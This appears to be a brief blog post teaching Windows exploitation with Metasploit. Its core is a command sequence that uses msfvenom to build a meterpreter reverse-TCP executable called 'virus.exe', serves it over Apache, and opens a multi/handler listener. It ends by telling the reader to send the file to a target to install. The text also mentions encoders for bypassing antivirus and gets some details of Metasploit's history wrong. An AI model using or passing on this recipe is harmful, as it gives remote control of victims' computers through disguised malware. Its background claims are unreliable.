Windows Exploitation using Metasploit Framework (Using msfvenom or .exe...
* Exploitation:-
*There are three steps in Exploitation :-
1. Info-gathering:- Target identyfy.
2. scanning:- To find loophole in target.
3. Exploitation:- To get in your target.
*USE METASPLOIT FRAMEWORK FOR EXPLOITATION //Metasploit is Hackers Factory.
/*
FOR OUR UNDERSTANDING
Factory = Department
Metasploit = Module
*/
*There are 6 Modules in metasploit framework:-
1. Auxilary module:- scanning/Dos.
2. Exploits:- its like Weapon.
3. Payloads:- it will make entry on your target.
4. Post:- activity performed in this module but after successful exploitation.
5. Encoder:- For bypassing antivirus.
6. Nopes:- Maintain file size of virus.
*Metasploit Framework:-
Developed by H.D. moore. (2003) in python there are only 3 auxilary and 2 exploit then sell to Rapid Company (2007)
He Developed in ruby
//Run metasploit framewrok = msfconsole
//COMMANDS :-
*Exploitation Using msfvenom:- ( Client side Attack )
= msfvenom -p windows/meterpreter/reverse_tcp lhost-your ip- lport=-any port you want open- -f exe (greater than)/var/www/html/virus.exe
= service apache2 start
= msfconsole
= use multi/handler
= set payload windows/meterpreter/reverse_tcp
= set lhost_your ip // _= Space
= set lport_any port // _= Space
= show options
= exploit
/* msfvenom file send to your target and install it
same lhost and lport in whole code */
Comments
Post a Comment